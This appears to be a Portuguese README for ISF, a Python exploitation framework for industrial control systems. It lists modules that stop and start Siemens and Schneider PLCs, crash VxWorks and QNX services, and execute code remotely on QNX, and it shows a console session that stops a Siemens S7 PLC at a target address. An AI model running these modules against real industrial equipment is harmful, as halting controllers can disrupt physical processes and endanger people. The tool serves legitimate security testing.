isf
ve release
ISF (Industrial Exploitation Framework) é uma estrutura de exploração baseada em Python, é semelhante à estrutura metasploit.
ISF é baseado no projeto de código aberto routersploit.
Leia isto em outros idiomas: Inglês, 简体中文,
O uso da ISF para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.
Nome | Caminho | Descrição |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Cliente Modbus-TCP |
wdb2_client | icssploit/clients/wdb2_client.py | Cliente WdbRPC versão 2 (Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | Cliente s7comm (CLP S7 300/400) |
Nome | Caminho | Descrição |
---|---|---|
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | Partida/parada do CLP S7-300/400 |
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC iniciar/parar/reiniciar |
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Dos remotos Vxworks RPC (CVE-2015-7599) |
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Partida/parada do CLP Schneider Quantum série 140 |
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP serviço dos |
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | Execução remota de código QNX qconn |
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Configuração de IP do dispositivo Profinet DCP |
Nome | Caminho | Descrição |
---|---|---|
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Scanner Profinet DCP |
vxworks_6_scan | scanners/vxworks_6_scan.py | Scanner Vxworks 6.x |
s7comm_scan | scanners/s7comm_scan.py | Scanner S7comm |
enip_scan | scanners/enip_scan.py | Scanner IP Ethernet |
Esses protocolos podem ser usados em outro framework Fuzzing como Kitty ou criar seu próprio cliente.
Nome | Caminho | Descrição |
---|---|---|
pn_dcp | icssploit/protocolos/pn_dcp | Protocolo Profinet DCP |
modbus_tcp | icssploit/protocolos/modbus_tcp | Protocolo Modbus TCP |
wdbrpc2 | icssploit/protocolos/wdbrpc2 | Protocolo WDB RPC versão 2 |
s7comm | icssploit/protocols/s7comm.py | Protocolo S7comm |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Você pode usar a tecla Tab para concluir.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >